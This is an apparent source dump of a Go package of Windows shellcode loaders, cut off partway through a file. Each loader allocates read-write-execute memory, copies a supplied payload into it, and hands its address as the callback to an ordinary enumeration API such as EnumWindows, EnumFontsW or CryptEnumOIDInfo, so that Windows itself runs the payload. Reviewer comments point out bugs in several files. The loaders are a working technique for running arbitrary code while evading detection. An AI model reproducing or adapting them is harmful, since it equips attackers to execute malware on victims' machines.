├── pkg ├── EnumWindows │ └── EnumWindows.go ├── EnumUILanguagesW │ └── EnumUILanguagesW.go ├── EnumPwrSchemes │ └── EnumPwrSchemes.go ├── EnumSystemLocales │ └── EnumSystemLocales.go ├── EnumPageFilesW │ └── EnumPageFilesW.go ├── EnumPropsW │ └── EnumPropsW.go ├── EnumPropsEx │ └── EnumPropsEx.go ├── ImmEnumInputContext │ └── ImmEnumInputContext.go ├── EnumThreadWindows │ └── EnumThreadWindows.go ├── EnumLanguageGroupLocalesW │ └── EnumLanguageGroupLocalesW.go ├── EnumWindowStationsW │ └── EnumWindowStationsW.go ├── CryptEnumOIDInfo │ └── CryptEnumOIDInfo.go ├── EnumResourceTypesW │ └── EnumResourceTypesW.go ├── EnumFontsW │ └── EnumFontsW.go ├── CertEnumSystemStore │ └── CertEnumSystemStore.go ├── CertEnumSystemStoreLocation │ └── CertEnumSystemStoreLocation.go ├── EnumTimeFormatsEx │ └── EnumTimeFormatsEx.go ├── EnumerateLoadedModules │ └── EnumerateLoadedModules.go ├── config │ └── Funcinit.go ├── EnumDisplayMonitors │ └── EnumDisplayMonitors.go ├── FlsAlloc │ └── FlsAlloc.go ├── EnumFontFamiliesW │ └── EnumFontFamiliesW.go ├── InitOnceExecuteOnce │ └── InitOnceExecuteOnce.go ├── EnumCalendarInfo │ └── EnumCalendarInfo.go ├── EnumChildWindows │ └── EnumChildWindows.go ├── EnumCalendarInfoEX │ └── EnumCalendarInfoEX.go ├── EnumICMProfiles │ └── EnumICMProfiles.go ├── EnumObjects │ └── EnumObjects.go ├── EnumResourceTypesExW │ └── EnumResourceTypesExW.go ├── EnumFontFamiliesExW │ └── EnumFontFamiliesExW.go ├── SymEnumProcesses │ └── SymEnumProcesses.go ├── EnumDesktopWindows │ └── EnumDesktopWindows.go ├── SetTimer │ └── SetTimer.go ├── SysEnumSourceFiles │ └── SysEnumSourceFiles.go ├── EnumDesktopW │ └── EnumDesktopW.go ├── CopyFileEx │ └── CopyFileEx.go ├── EnumDirTreeW │ └── EnumDirTreeW.go ├── CreateTimerQueueTimer_Tech │ └── CreateTimerQueueTimer_Tech.go ├── FiberContextEdit │ └── FiberContextEdit.go ├── LdrpCallInitRoutine │ └── LdrpCallInitRoutine.go ├── ImageGetDigestStream │ └── ImageGetDigestStream.go ├── CopyFile2 │ └── CopyFile2.go ├── 
RtlUserFiberStart │ └── RtlUserFiberStart.go ├── CreateThreadPoolWait │ └── CreateThreadPoolWait.go ├── SetupCommitFileQueueW │ └── SetupCommitFileQueueW.go ├── SymFindFileInPath │ └── SymFindFileInPath.go └── LdrEnumerateLoadedModules │ └── LdrEnumerateLoadedModules.go └── README.md /pkg/EnumWindows/EnumWindows.go: -------------------------------------------------------------------------------- 1 | /* EnumWindows loader. VirtualAlloc commits a PAGE_EXECUTE_READWRITE (RWX) region sized to the payload, RtlMoveMemory copies the payload into it, and the region address is handed to user32!EnumWindows as its WNDENUMPROC, so user32 transfers control to the payload. Every loader under pkg/ follows this shape and exports Callback(shellcode). NOTE(review): Callback returns nothing, so a caller cannot tell whether the allocation or the callback succeeded; MustLoadDLL/MustFindProc panic at package init if a DLL or export is missing. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX in a single step: readable, writable and executable */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") /* NOTE(review): loaded by bare name; unless Go treats this exact spelling as a known system DLL it is presumably resolved through the default search order (application directory first) — confirm, or load by absolute path / NewLazySystemDLL */ 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | EnumWindows = User32.MustFindProc("EnumWindows") 24 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 25 | ) 26 | 27 | /* Callback allocates RWX memory, copies shellcode into it and has EnumWindows invoke it. It returns nothing and reports no error. */ func Callback(shellcode []byte) { 28 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics with an index-out-of-range when shellcode is empty */ 30 | EnumWindows.Call(addr, 0) /* EnumWindows calls the proc once per top-level window; whether it is re-entered depends on what the payload returns */ 31 | } 32 | -------------------------------------------------------------------------------- /pkg/EnumUILanguagesW/EnumUILanguagesW.go: -------------------------------------------------------------------------------- 1 | /* EnumUILanguagesW loader: RWX allocate-and-copy as in the other loaders, with the region address passed to kernel32!EnumUILanguagesW as its UILANGUAGE_ENUMPROCW (flags MUI_LANGUAGE_ID, lParam NULL). */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | MUI_LANGUAGE_ID = 0x4 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumUILanguagesW = kernel32.MustFindProc("EnumUILanguagesW") 25 | RtlMoveMemory = 
ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has EnumUILanguagesW invoke it; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | EnumUILanguagesW.Call(addr, MUI_LANGUAGE_ID, NULL) /* proc, dwFlags, lParam */ 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumPwrSchemes/EnumPwrSchemes.go: -------------------------------------------------------------------------------- 1 | /* EnumPwrSchemes loader: RWX allocate-and-copy, then the region address is passed to PowrProf!EnumPwrSchemes as its PWRSCHEMESENUMPROC, which PowrProf calls once per power scheme. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | dummy [522]byte /* unused */ 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | PowrProf = syscall.MustLoadDLL("PowrProf.dll") /* NOTE(review): bare-name load; presumably resolved through the default search order (application directory first) rather than System32 only — confirm, or load by absolute path / NewLazySystemDLL */ 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumPwrSchemes = PowrProf.MustFindProc("EnumPwrSchemes") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | /* Callback allocates RWX memory, copies shellcode into it and has EnumPwrSchemes invoke it; no error is reported. */ func Callback(shellcode []byte) { 30 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 32 | EnumPwrSchemes.Call(addr, NULL) /* proc, lParam */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumSystemLocales/EnumSystemLocales.go: -------------------------------------------------------------------------------- 1 | /* EnumSystemLocales loader. Despite the file name it resolves kernel32!EnumSystemLocalesEx and passes the RWX payload address as its LOCALE_ENUMPROCEX with dwFlags LOCALE_ALL. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | LOCALE_ALL = 0 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 
| ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumSystemLocalesEx = kernel32.MustFindProc("EnumSystemLocalesEx") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has EnumSystemLocalesEx invoke it; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | EnumSystemLocalesEx.Call(addr, LOCALE_ALL, NULL, NULL) /* proc, dwFlags, lParam, lpReserved */ 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumPageFilesW/EnumPageFilesW.go: -------------------------------------------------------------------------------- 1 | /* EnumPageFilesW loader: RWX allocate-and-copy, then the region address is passed to kernel32!K32EnumPageFilesW as its PENUM_PAGE_FILE_CALLBACKW. NOTE(review): the callback is only invoked once per page file, so on a system with no page file the payload presumably never runs — confirm. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 22 | K32EnumPageFilesW = kernel32.MustFindProc("K32EnumPageFilesW") 23 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 24 | ) 25 | 26 | /* Callback allocates RWX memory, copies shellcode into it and has K32EnumPageFilesW invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 27 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 28 | /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ if err != nil && err.Error() != "The operation completed successfully." 
{ 29 | syscall.Exit(0) 30 | } 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 32 | K32EnumPageFilesW.Call(addr, 0) /* proc, pContext */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumPropsW/EnumPropsW.go: -------------------------------------------------------------------------------- 1 | /* EnumPropsW loader: RWX allocate-and-copy, then the region address is passed to user32!EnumPropsW as the PROPENUMPROCW for the window returned by GetTopWindow(NULL). NOTE(review): EnumPropsW only calls the proc once per property set on that window; if the window has no properties the payload presumably never runs — confirm. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") /* NOTE(review): bare-name load; presumably default search order unless Go treats this exact spelling as a system DLL — confirm */ 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetTopWindow = User32.MustFindProc("GetTopWindow") 24 | EnumPropsW = User32.MustFindProc("EnumPropsW") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has EnumPropsW invoke it for the top window; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | dummy, _, _ := GetTopWindow.Call(0) /* window handle; 0 (no window) is not checked */ 32 | EnumPropsW.Call(dummy, addr, 0) /* EnumPropsW takes (hWnd, lpEnumFunc); the third argument is surplus */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumPropsEx/EnumPropsEx.go: -------------------------------------------------------------------------------- 1 | /* EnumPropsEx loader: RWX allocate-and-copy, then the region address is passed to user32!EnumPropsExW as the PROPENUMPROCEXW for the window returned by GetTopWindow(NULL). NOTE(review): as with EnumPropsW, the proc only runs once per property on that window. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | GetTopWindow = 
User32.MustFindProc("GetTopWindow") 24 | EnumPropsExW = User32.MustFindProc("EnumPropsExW") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has EnumPropsExW invoke it for the top window; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | dummy, _, _ := GetTopWindow.Call(0) /* window handle; 0 is not checked */ 32 | EnumPropsExW.Call(dummy, addr, 0) /* hWnd, lpEnumFunc, lParam */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/ImmEnumInputContext/ImmEnumInputContext.go: -------------------------------------------------------------------------------- 1 | /* ImmEnumInputContext loader: RWX allocate-and-copy, then the region address is passed to Imm32!ImmEnumInputContext as its IMCENUMPROC for thread id 0 (the calling thread). */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | NULL = 0 17 | ) 18 | 19 | var ( 20 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 21 | ntdll = syscall.MustLoadDLL("ntdll.dll") 22 | Imm32 = syscall.MustLoadDLL("Imm32.dll") /* NOTE(review): bare-name load; presumably resolved through the default search order (application directory first) — confirm, or load by absolute path / NewLazySystemDLL */ 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | ImmEnumInputContext = Imm32.MustFindProc("ImmEnumInputContext") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has ImmEnumInputContext invoke it; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | ImmEnumInputContext.Call(NULL, addr, NULL) /* idThread, lpfn, lParam; the proc runs once per input context of the thread */ 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumThreadWindows/EnumThreadWindows.go: -------------------------------------------------------------------------------- 1 | /* EnumThreadWindows loader: RWX allocate-and-copy, then the region address is passed to user32!EnumThreadWindows as its WNDENUMPROC with thread id 0. NOTE(review): EnumThreadWindows is documented to take a real thread id; with 0 the proc is only invoked if some window is attributed to that id — confirm the payload actually runs. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 
PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | LOCALE_ALL = 0 /* unused here */ 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") 24 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 25 | EnumThreadWindows = User32.MustFindProc("EnumThreadWindows") 26 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 27 | ) 28 | 29 | /* Callback allocates RWX memory, copies shellcode into it and has EnumThreadWindows invoke it; no error is reported. */ func Callback(shellcode []byte) { 30 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 31 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 32 | EnumThreadWindows.Call(0, addr, NULL) /* dwThreadId, lpfn, lParam */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumLanguageGroupLocalesW/EnumLanguageGroupLocalesW.go: -------------------------------------------------------------------------------- 1 | /* EnumLanguageGroupLocalesW loader: RWX allocate-and-copy, then the region address is passed to kernel32!EnumLanguageGroupLocalesW as its LANGGROUPLOCALE_ENUMPROCW for language group LGRPID_ARABIC, so it runs once per locale in that group. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | dummy [522]byte /* unused */ 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 17 | LGRPID_ARABIC = 0x000d 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = syscall.MustLoadDLL("ntdll.dll") 23 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 24 | EnumLanguageGroupLocalesW = kernel32.MustFindProc("EnumLanguageGroupLocalesW") 25 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 26 | ) 27 | 28 | /* Callback allocates RWX memory, copies shellcode into it and has EnumLanguageGroupLocalesW invoke it; no error is reported. */ func Callback(shellcode []byte) { 29 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 30 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 31 | EnumLanguageGroupLocalesW.Call(addr, LGRPID_ARABIC, 0, 0) /* proc, LanguageGroup, dwFlags, lParam */ 32 | } 33 | -------------------------------------------------------------------------------- /pkg/EnumWindowStationsW/EnumWindowStationsW.go: 
-------------------------------------------------------------------------------- 1 | /* EnumWindowStationsW loader: RWX allocate-and-copy, then the region address is passed to user32!EnumWindowStationsW as its WINSTAENUMPROCW, so it runs once per window station in the session. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | User32 = syscall.MustLoadDLL("User32.dll") 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | EnumWindowStationsW = User32.MustFindProc("EnumWindowStationsW") 24 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 25 | ) 26 | 27 | /* Callback allocates RWX memory, copies shellcode into it and has EnumWindowStationsW invoke it; no error is reported. */ func Callback(shellcode []byte) { 28 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 30 | /* dead code: p1 := []byte{110, 116, 100, 108, 108, 46, 100, 108, 108, 0} decodes to "ntdll.dll", not Kernel32.dll as the original comment claimed */ 31 | EnumWindowStationsW.Call(addr, 0) /* lpEnumFunc, lParam */ 32 | } 33 | -------------------------------------------------------------------------------- /pkg/CryptEnumOIDInfo/CryptEnumOIDInfo.go: -------------------------------------------------------------------------------- 1 | /* CryptEnumOIDInfo loader: RWX allocate-and-copy, then the region address is passed to Crypt32!CryptEnumOIDInfo as its PFN_CRYPT_ENUM_OID_INFO (group 0 = all groups), so it runs once per registered OID. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | Crypt32 = syscall.MustLoadDLL("Crypt32.dll") /* NOTE(review): bare-name load; presumably default search order unless Go treats this exact spelling as a system DLL — confirm */ 22 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 23 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 24 | CryptEnumOIDInfo = Crypt32.MustFindProc("CryptEnumOIDInfo") 25 | ) 26 | 27 | /* Callback allocates RWX memory, copies shellcode into it and has CryptEnumOIDInfo invoke it. On an allocation "failure" (see the note on the check) it exits the process with status 0. */ func Callback(shellcode []byte) { 28 | addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) 29 | if err != nil && 
err.Error() != "The operation completed successfully." { /* NOTE(review): Proc.Call always returns a non-nil error (errno 0 stringifies as this English text), so this compares a localized message; on a non-English Windows a successful allocation still exits here. addr == 0 is the reliable failure test, and Exit(0) reports success to the parent. */ 30 | syscall.Exit(0) 31 | } 32 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 33 | CryptEnumOIDInfo.Call(0, 0, 0, addr) /* dwGroupId, dwFlags, pvArg, pfnEnumOIDInfo */ 34 | } 35 | -------------------------------------------------------------------------------- /pkg/EnumResourceTypesW/EnumResourceTypesW.go: -------------------------------------------------------------------------------- 1 | /* EnumResourceTypesW loader: RWX allocate-and-copy, then a fresh LoadLibraryW("Kernel32.dll") handle and the region address are passed to kernel32!EnumResourceTypesW, which calls the ENUMRESTYPEPROCW once per resource type in that module. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | if1 [0]byte /* unused */ 10 | ) 11 | 12 | const ( 13 | MEM_COMMIT = 0x1000 14 | MEM_RESERVE = 0x2000 15 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 16 | ) 17 | 18 | var ( 19 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 20 | ntdll = syscall.MustLoadDLL("ntdll.dll") 21 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 22 | EnumResourceTypesW = kernel32.MustFindProc("EnumResourceTypesW") 23 | LoadLibraryW = kernel32.MustFindProc("LoadLibraryW") 24 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 25 | ) 26 | 27 | /* Callback allocates RWX memory, copies shellcode into it and has EnumResourceTypesW invoke it; no error is reported. */ func Callback(shellcode []byte) { 28 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 29 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 30 | p1, _ := syscall.UTF16PtrFromString("Kernel32.dll") /* conversion error ignored; the package already holds kernel32 as a DLL handle */ 31 | lw, _, _ := LoadLibraryW.Call(uintptr(unsafe.Pointer(p1))) /* module handle; 0 is not checked */ 32 | EnumResourceTypesW.Call(lw, addr, 0) /* hModule, lpEnumFunc, lParam */ 33 | } 34 | -------------------------------------------------------------------------------- /pkg/EnumFontsW/EnumFontsW.go: -------------------------------------------------------------------------------- 1 | /* EnumFontsW loader: RWX allocate-and-copy, then the region address is passed to Gdi32!EnumFontsW as its FONTENUMPROCW for the screen DC from GetDC(NULL), so it runs once per font. NOTE(review): the DC is never released with ReleaseDC. */ package Loaders 2 | 3 | import ( 4 | "syscall" 5 | "unsafe" 6 | ) 7 | 8 | var ( 9 | timer int /* unused */ 10 | dummy [522]byte /* unused */ 11 | ) 12 | 13 | const ( 14 | MEM_COMMIT = 0x1000 15 | MEM_RESERVE = 0x2000 16 | PAGE_EXECUTE_READWRITE = 0x40 /* RWX */ 17 | NULL = 0 18 | ) 19 | 20 | var ( 21 | kernel32 = syscall.MustLoadDLL("kernel32.dll") 22 | ntdll = 
syscall.MustLoadDLL("ntdll.dll") 23 | User32 = syscall.MustLoadDLL("User32.dll") 24 | Gdi32 = syscall.MustLoadDLL("Gdi32.dll") /* NOTE(review): bare-name load; presumably resolved through the default search order (application directory first) — confirm, or load by absolute path / NewLazySystemDLL */ 25 | VirtualAlloc = kernel32.MustFindProc("VirtualAlloc") 26 | GetDC = User32.MustFindProc("GetDC") 27 | EnumFontsW = Gdi32.MustFindProc("EnumFontsW") 28 | RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory") 29 | ) 30 | 31 | /* Callback allocates RWX memory, copies shellcode into it and has EnumFontsW invoke it; no error is reported. */ func Callback(shellcode []byte) { 32 | addr, _, _ := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) /* NOTE(review): result unchecked — on failure addr is 0 and the copy below targets a null address */ 33 | RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) /* panics when shellcode is empty */ 34 | dc, _, _ := GetDC.Call(NULL) /* screen DC; 0 is not checked and the DC is never released */ 35 | EnumFontsW.Call(dc, NULL, addr, NULL) /* hdc, lpLogfont (NULL = all fonts), lpProc, lParam */ 36 | } 37 | -------------------------------------------------------------------------------- /pkg/CertEnumSystemStore/CertEnumSystemStore.go: -------------------------------------------------------------------------------- 1 | /* CertEnumSystemStore loader: RWX allocate-and-copy, then the region address is passed to Crypt32!CertEnumSystemStore as its PFN_CERT_ENUM_SYSTEM_STORE for the CURRENT_USER location, so it runs once per system store. This file alone depends on golang.org/x/sys/windows (for the CERT_SYSTEM_STORE_CURRENT_USER constant). */ package Loaders 2 | 3 | import ( 4 | "golang.org/x/sys/windows" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | const ( 10 | MEM_COMMIT = 0x1000 11 | MEM_RESERVE = 0x2000 12 | PAGE_EXECUTE_READWRITE = 0x40 /* 